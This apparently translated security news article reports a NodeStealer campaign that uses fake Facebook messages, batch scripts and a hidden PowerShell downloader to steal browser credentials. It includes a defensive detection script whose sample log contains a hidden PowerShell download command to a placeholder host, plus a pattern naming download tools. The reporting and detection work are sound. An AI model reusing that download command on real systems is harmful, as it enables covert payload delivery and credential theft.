2023-09-15

An ongoing campaign is targeting Facebook business accounts with fake messages in order to harvest victims’ credentials using a variant of NodeStealer based on Python and potentially take control of their accounts for subsequent malicious activity.

When NodeStealer emerged, according to analysts

“The attacks are mainly reaching victims in Southern Europe and North America across several sectors, led by manufacturing services and the technology sector”, said Jan Michael, a researcher at Netskope Threat Labs, in an analysis published Thursday.

First documented by Meta in May 2023, NodeStealer originated as JavaScript malware capable of stealing cookies and passwords from web browsers to compromise Facebook, Gmail and Outlook accounts.

Last month, Palo Alto Networks Unit 42 revealed a separate wave of attacks, carried out in December 2022, that used a Python version of the malware, with some iterations also designed to carry out cryptocurrency theft.

Netskope’s latest findings suggest that the attackers behind the operation have likely resumed their attack efforts, while also adopting tactics used by other adversaries operating in the same country with the same objectives.

Just last week, Guardio Labs detailed how fraudulent messages sent via Facebook Messenger from a botnet of fake and hijacked personal accounts are used to deliver ZIP or RAR archive files to unsuspecting recipients in order to spread stealer malware.

The same modus operandi serves as the initial vector for NodeStealer’s intrusion chains to distribute RAR files hosted on Facebook’s content delivery network (CDN).

How this “new” malware works

“Images of defective products have been used as bait to convince the owners or administrators of Facebook business pages [Facebook Business] to download the malware payload”, explained Michael.

These archives contain a batch script that, when executed, opens the Chrome web browser and takes the victim to a benign web page. In the background, however, a PowerShell command runs to fetch additional payloads, including the Python interpreter and the NodeStealer malware itself.

The stealer malware, in addition to capturing credentials and cookies – whether they come from Facebook or not – from various web browsers, is designed to collect system metadata and exfiltrate the information via Telegram.
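The chain described in the two paragraphs above (a batch file that launches a Chrome decoy and a hidden PowerShell download, then the Python interpreter) maps directly onto process-creation telemetry, which is where a defender would look for it. The following is an added example, not code from the article, from Netskope Threat Labs or from any other vendor: it parses a constructed, pipe-delimited log of process-creation events (every path, pid and URL in it is made up and is not an indicator from the campaign) and flags a cmd.exe that ran a .bat and spawned that combination of children. The log format, the DOWNLOAD_HINTS pattern, the TRUSTED_DIRS list and the severity rule are assumptions chosen for the demonstration.

```python
"""Flag the process chain this article describes (batch script that spawns a
Chrome decoy and a PowerShell downloader, followed by a Python interpreter)
in process-creation telemetry.

Added example for this article; it is not code from Netskope Threat Labs or
any other vendor. The log format, field names and every sample value are
constructed for illustration, not indicators taken from the campaign.
"""
import re
from collections import defaultdict

# Constructed sample telemetry, one process-creation event per line:
# timestamp|pid|ppid|image path|command line
SAMPLE_EVENTS = """\
10:00:01|4100|3900|C:\\Windows\\explorer.exe|explorer.exe
10:00:05|4212|4100|C:\\Windows\\System32\\cmd.exe|cmd.exe /c C:\\Users\\u\\Downloads\\defective_product.bat
10:00:06|4230|4212|C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|chrome.exe https://www.example.com/
10:00:07|4245|4212|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -w hidden -c Invoke-WebRequest -Uri https://download.example/pkg.zip -OutFile C:\\Users\\u\\AppData\\Local\\Temp\\pkg.zip
10:00:15|4260|4212|C:\\Users\\u\\AppData\\Local\\Temp\\python\\python.exe|python.exe C:\\Users\\u\\AppData\\Local\\Temp\\project\\main.py
10:05:00|5000|4100|C:\\Windows\\System32\\cmd.exe|cmd.exe /c C:\\dev\\build.bat
10:05:01|5010|5000|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -c Get-ChildItem
"""

# Command-line fragments that indicate PowerShell fetching content from the network
# (assumed list; extend it to match the tooling seen in your own environment).
DOWNLOAD_HINTS = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)

# Directories from which a legitimately installed interpreter would normally run
# (assumed list). An interpreter dropped elsewhere is worth an extra stage tag.
TRUSTED_DIRS = ("c:\\program files", "c:\\program files (x86)", "c:\\windows")


def parse_events(text):
    """Parse the pipe-delimited sample format into dicts with integer pids."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pid, ppid, image, cmdline = line.split("|", 4)
        events.append({"ts": ts, "pid": int(pid), "ppid": int(ppid),
                       "image": image, "cmdline": cmdline})
    return events


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_batch_chains(events):
    """Return one finding per cmd.exe that ran a .bat and spawned the chain.

    A chain is reported when the batch file spawned a PowerShell downloader
    together with a browser decoy and/or a Python interpreter; the finding is
    rated 'high' when all three stages are present, 'medium' otherwise.
    """
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    findings = []
    for e in events:
        if basename(e["image"]) != "cmd.exe" or ".bat" not in e["cmdline"].lower():
            continue
        kids = children[e["pid"]]
        stages = []
        if any(basename(k["image"]) == "chrome.exe" for k in kids):
            stages.append("browser_decoy")
        if any(basename(k["image"]) == "powershell.exe" and DOWNLOAD_HINTS.search(k["cmdline"])
               for k in kids):
            stages.append("powershell_download")
        for k in kids:
            if basename(k["image"]) == "python.exe":
                stages.append("python_interpreter")
                if not k["image"].lower().startswith(TRUSTED_DIRS):
                    stages.append("interpreter_in_user_writable_path")
                break
        # A batch file that only opens a browser, or only runs PowerShell without a
        # download, is ordinary admin activity; require the downloader plus one more stage.
        if "powershell_download" in stages and len(stages) >= 2:
            all_three = {"browser_decoy", "powershell_download", "python_interpreter"} <= set(stages)
            findings.append({"pid": e["pid"], "batch": e["cmdline"], "stages": stages,
                             "severity": "high" if all_three else "medium"})
    return findings


if __name__ == "__main__":
    for f in find_batch_chains(parse_events(SAMPLE_EVENTS)):
        print(f"[{f['severity']}] pid {f['pid']}: {f['batch']} -> {', '.join(f['stages'])}")
```

Run against the constructed sample, the first batch file (pid 4212) is reported as high severity with all three stages plus the interpreter-in-user-writable-path tag, while the second batch file, whose PowerShell child only lists a directory, is ignored. In a real deployment the same parent-child logic is expressed as a Sysmon event ID 1 or EDR process-tree query; the value of the rule lies in correlating the siblings, since each child on its own looks benign.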

“Compared to previous variants, the new variant of NodeStealer uses batch files to download and execute Python scripts and steal credentials and cookies from different browsers and for different websites”, said Michael.

Michael added: “This campaign could be a gateway to a more targeted attack later, as they have already gathered useful intelligence. Attackers who have stolen Facebook cookies and credentials can use them to take control of the account and make fraudulent transactions by leveraging the legitimate business page”.

Multi-platform and “multi-browser”

Since not everyone uses Windows, whoever created NodeStealer appears to have reasoned: “PC users all use a browser, so what if we went after the browser instead of the operating system?”.

In practice, whether you use Windows, Linux or Mac, the browsers are usually the same, and most of them are Chromium-based; for this reason, in this specific case the choice was to attack the browser rather than a flaw in the operating system.